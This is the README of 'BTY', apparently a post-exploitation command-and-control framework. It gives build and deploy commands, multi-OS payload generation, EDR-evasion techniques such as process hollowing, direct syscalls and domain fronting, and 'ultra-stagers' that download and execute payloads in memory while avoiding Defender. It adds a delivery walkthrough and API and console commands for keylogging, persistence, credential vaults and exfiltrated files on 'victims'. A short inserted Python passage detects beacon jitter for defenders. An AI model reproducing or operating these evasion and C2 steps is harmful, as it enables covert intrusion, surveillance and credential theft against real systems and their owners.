Post-exploitation command & control framework for red team operations and security research.
ruby570bocadito © 2026 — MIT License
```bash
# Dependencies
sudo apt install -y golang-go python3 curl git
# Clone
git clone https://github.com/ruby570bocadito/bty && cd BTY
# Build (Go 1.23+)
cd src/go
CGO_ENABLED=0 go build -ldflags="-s -w" -o ../../bty-server ./cmd/server/main.go
CGO_ENABLED=0 go build -ldflags="-s -w" -o ../../bty-agent ./cmd/agent/main.go
cd ../..
python3 scripts/deploy.py
```

Auto-detects the IP, generates config.yaml and starts 4 listeners:
| Port | Protocol | Use |
|---|---|---|
| 8443 | TCP + TLS | Agents |
| 8445 | HTTP | Long-polling |
| 8446 | WebSocket | Real time |
| 9090 | HTTP | REST API + Dashboard |
```
Local IP: 192.168.1.100
Dashboard: http://192.168.1.100:9090
Login: admin / admin
```
```bash
# Interactive menu (IP auto-detected)
python3 scripts/payload.py
# Direct
python3 scripts/payload.py --os windows
python3 scripts/payload.py --os all
python3 scripts/payload.py --os all --server 10.0.0.5:8443
```

| Format | Target | Size |
|---|---|---|
| EXE (Go) | Windows x64 | 6.5 MB |
| ELF (Go) | Linux x64 | 6.4 MB |
| Mach-O (Go) | macOS x64/ARM | 6.0-6.5 MB |
| PowerShell | Windows | 408 B |
| Python | Any | 308 B |
| C source | Compile | 23 KB |
The precompiled payloads are in dist/.
| # | Technique | Effect |
|---|---|---|
| 1 | Process Hollowing | Payload runs inside svchost.exe (Microsoft-signed) |
| 2 | Direct Syscalls | Bypasses ntdll.dll hooks; EDR does not see the calls |
| 3 | C Shellcode Stager | 2 KB with no PE header, PEB API resolver, XOR decrypt |
| 4 | TLS + Domain Fronting | C2 traffic looks like HTTPS to cdn.cloudflare.com |
| 5 | Sleep Obfuscation | Heap/stack encrypted while idle |
| 6 | Traffic Shaper | Patterns mimic human browsing |
| 7 | ObscuredString | Sensitive strings XOR-encrypted in the binary |
| 8 | Anti-sandbox | 30 s delay + uptime check |
| 9 | Jitter | Random 25-45 s heartbeat, reconnect ±30% |
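A defender-side illustration of technique 9 above, added here and not part of the BTY project: it scans constructed connection-log records (the log format and sample values are assumptions) for flows whose contact interval stays inside the 25-45 s heartbeat window the table describes, which is the behaviour a network sensor would key on.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample log, one connection per line: "epoch_seconds src_ip dst_ip dst_port".
# The first flow keeps a 25-45 s cadence; the second is ordinary bursty web traffic.
SAMPLE_LOG = """\
1700000000 10.0.0.7 203.0.113.9 8443
1700000031 10.0.0.7 203.0.113.9 8443
1700000070 10.0.0.7 203.0.113.9 8443
1700000097 10.0.0.7 203.0.113.9 8443
1700000140 10.0.0.7 203.0.113.9 8443
1700000178 10.0.0.7 203.0.113.9 8443
1700000005 10.0.0.8 198.51.100.4 443
1700000006 10.0.0.8 198.51.100.4 443
1700000300 10.0.0.8 198.51.100.4 443
"""

HEARTBEAT_MIN, HEARTBEAT_MAX = 25.0, 45.0  # window stated in the technique table
MIN_OBSERVATIONS = 4                        # enough connections to judge a cadence


def parse_log(text):
    """Group connection timestamps by (src, dst, port)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        flows[(src, dst, int(port))].append(int(ts))
    return flows


def find_beacons(text, lo=HEARTBEAT_MIN, hi=HEARTBEAT_MAX, min_obs=MIN_OBSERVATIONS):
    """Return flows whose every inter-connection gap falls inside [lo, hi]."""
    hits = []
    for key, stamps in parse_log(text).items():
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if len(gaps) + 1 < min_obs:
            continue
        if all(lo <= g <= hi for g in gaps):
            hits.append({"flow": key, "mean_gap": mean(gaps), "stdev": pstdev(gaps)})
    return hits
```

Widen the window or loosen the all-gaps rule when the traffic shaper (technique 6) is expected to add extra connections between heartbeats.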
```bash
# XOR-encrypted stagers (PS1, Python, Bash)
python3 scripts/stager.py
# Ultra-stagers that do not trigger Defender (VBS, certutil, BITSAdmin)
python3 scripts/ultra-stager.py
```

The stager (366-byte VBS / 106-byte certutil) downloads the encrypted payload, decrypts it in memory and executes it without touching disk.
1. python3 scripts/payload.py --os all --evasive
2. cd payloads/ && python3 -m http.server 8000
3. On Windows → wscript stager.vbs
4. The stager downloads + decrypts + executes in RAM
5. Zero static detection, zero writes to disk
http://YOUR_IP:9090 → admin / admin
- Expandable victim table (click → detail + history)
- Command box pinned at the bottom with a victim selector
- OS distribution, statistics, quick command
- File browser for exfiltrated data
- Minimalist professional white theme
```bash
python3 scripts/console.py
```

```
bty > sessions
+------+------------------+------+-------+----+-------+
| ID   | Hostname         | User | OS    | St | Tasks |
+------+------------------+------+-------+----+-------+
| abc  | DESKTOP-I1RVLF3  | rby  | linux | ●  | 5     |
+------+------------------+------+-------+----+-------+
bty > interact abc
[abc] rby@DESKTOP-I1RVLF3 > whoami
rby
[abc] rby@DESKTOP-I1RVLF3 > sysinfo
Hostname: DESKTOP-I1RVLF3 ...
[abc] rby@DESKTOP-I1RVLF3 > background
bty >
```

Commands: sessions, interact, shell, broadcast, vault, files, health, help
```bash
curl -u admin:admin http://IP:9090/api/sessions
curl -u admin:admin -X POST .../api/cmd -d '{"agent_id":"ID","command":"whoami"}'
curl -u admin:admin -X POST .../api/broadcast -d '{"command":"id"}'
```

| Method | Path | Description |
|---|---|---|
| GET | /api/health | Status |
| GET | /api/sessions | Victims |
| GET | /api/sessions/:id | Detail + tasks |
| DELETE | /api/sessions/:id | Kill |
| POST | /api/cmd | Run command |
| POST | /api/broadcast | Broadcast |
| POST | /api/socks | SOCKS5 proxy |
| POST | /api/portfwd | Port forward |
| POST | /api/vault | Store credential |
| GET | /api/vault?q=X | Search |
| POST | /api/files | Upload |
| GET | /api/files | List |
Send these commands via the API or the console:

| Command | Function |
|---|---|
| sysinfo | Full system info |
| ps | Processes (ps aux / tasklist) |
| netinfo | Network (ifconfig + netstat) |
| persistence | Persistence (crontab, registry, launchagent) |
| screenshot | Screen capture |
| keylogger | Keylogger (Linux: /dev/input) |
| find:*.txt | Find files |
| modules | List modules |
```
BTY/
├── bty-server            ← C2 server (13 MB)
├── bty-agent             ← agent (6.4 MB)
├── config.yaml
├── README.md
├── LICENSE
│
├── src/
│   ├── go/               ← Go source (5888 LOC)
│   │   ├── cmd/{server,agent}/
│   │   └── internal/
│   │       ├── crypto/    ← X25519 + XChaCha20-Poly1305 + HKDF
│   │       ├── c2/        ← server, session FSM, tunnel, operations
│   │       ├── agent/     ← agent: reconnect, exec, modules
│   │       ├── evasion/   ← hollowing, syscalls, sleepmask, camouflage
│   │       ├── db/        ← pure-Go SQLite
│   │       ├── config/    ← YAML loader
│   │       ├── transport/ ← TCP, HTTP, WS, DNS
│   │       └── socks/     ← SOCKS5 RFC 1928
│   ├── agents/{c,ps,py}/ ← C, PS1, Python agents
│   └── modules/          ← legacy Python modules
│
├── web/                  ← Vue 3 SPA dashboard
│   ├── src/views/        ← Login, Sessions, Files, Dashboard
│   └── dist/             ← built (97 KB)
│
├── scripts/
│   ├── deploy.py         ← C2 deployment
│   ├── payload.py        ← payload generator
│   ├── stager.py         ← evasive stagers
│   ├── ultra-stager.py   ← VBS, certutil, BITSAdmin
│   └── console.py        ← interactive CLI
│
├── dist/                 ← precompiled binaries
│   ├── bty-agent-linux (6.4 MB)
│   ├── bty-agent-windows.exe (6.5 MB)
│   ├── bty-agent-darwin-amd64 (6.5 MB)
│   └── bty-agent-darwin-arm64 (6.0 MB)
│
├── payloads/             ← generated payloads
└── data/                 ← runtime (DB, loot)
```
MIT — Copyright (c) 2026 ruby570bocadito
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
Disclaimer: This tool is intended exclusively for authorized security testing on systems you own or have explicit permission to test.